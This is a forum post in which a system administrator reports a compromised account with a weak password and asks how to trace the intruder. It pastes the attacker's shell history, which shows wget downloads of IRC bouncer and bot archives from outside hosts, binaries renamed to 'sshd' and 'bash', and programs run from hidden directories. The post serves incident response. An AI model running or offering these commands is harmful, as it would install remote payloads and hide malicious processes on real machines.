|
|||
weak password=broken
I just found out that a user had a weak password and it was broken. How do i trace what a user been doing?
Only see brief info in .bash_history (below) Any help at all is welcome, ive changed password and deleted the 2 directorys ive found. Not a single hit on robotbsd in google makes me a bit worried. Code:
ls ps 'ux uname uname -a uptime wget w passwd ls uname -a fetch www.psybnc.net/psyBNC-2.3.2-7.tar.gz wget wget www.psybnc.net/psyBNC-2.3.2-7.tar.gz ls tar xvf psyBNC-2.3.2-7.tar.gz tar xzvf psyBNC-2.3.2-7.tar.gz ls cd psybnc ls ls pico menuconf pico config.h ls pico psybncchk ls pico CHANGES make ls pico psybnc.conf ls rm -rf salt.h mv psybnc sshd export PATH="." sshd ps -ux ls exit ps-ux ps -ux ls kill -9 29089 ps -ux kill -9 28097 ps -ux ls cd psybnc ls pico psybnc.conf ls sshd export PATH="." sshd ps -ux ls exit ls -ps -ux ls ps -ux ls kill -9 12813 ls ps -ux ls cd psybnc ls mv sshd bash ./bash ps -ux kill -9 12169 ls cd .. ls wget badry.uv.ro/robotlinux.tgz ls tar xvf robotlinux.tgz cd ". .".l ls pico mech.set ./[kupdateb] [kupdateb] export PATH="." [kupdateb] ls exit ls ls -a cd /var/tmp mkdir roxy cd roxy/ ls ls -a wget badry.uv.ro/robotbsd.tgz ls tar xvf robotbsd.tgz ls cd ". .".b ls ls pico m.session ls ./[kupdateb] chmod +x * ls [kupdateb] ./ [kupdateb] ls cd .. ls ls exit ls ps -ux cd psybnc ls cd .. ls rm -rf psybnc ls tar xvf psyBNC-2.3.2-7.tar.gz tar xzvf psyBNC-2.3.2-7.tar.gz ls cd psybnc ls make ls mv psybnc bash ./bash ps -ux ls w uname -a uptime exit ls ps -ux ls -a exit ps -ux uname -a uptime ls -a ls -a exit ps -ux uname -a ls -a cd ". .".l ls ./[kupdateb] ls cd /var/tmp ls ls wget badry.uv.ro/robotbsd.tgz ls tar xvf robotbsd.tgz ls cd ". .".b ls ./[kupdateb] ls ps -ux uname -a uptime ls cd .. ls ls wget bucus.tvn.hu/wtf.tgz ls ftp tar xvf wtf.tgz ls cd wtf ls ./a 21.21 rm -rf a1 rm -rf scam ./a 53.21 exit |
|
|
Similar Threads | ||||
Thread | Thread Starter | Forum | Replies | Last Post |
A failure in password security | TerryP | Off-Topic | 3 | 25th September 2008 03:19 AM |
Set password for Folder | mfaridi | FreeBSD Security | 6 | 5th September 2008 10:49 PM |
Anyone Install Password Gorilla | revzalot | OpenBSD Installation and Upgrading | 3 | 26th August 2008 03:58 AM |
root password is blank | mfaridi | FreeBSD Security | 10 | 16th May 2008 10:19 PM |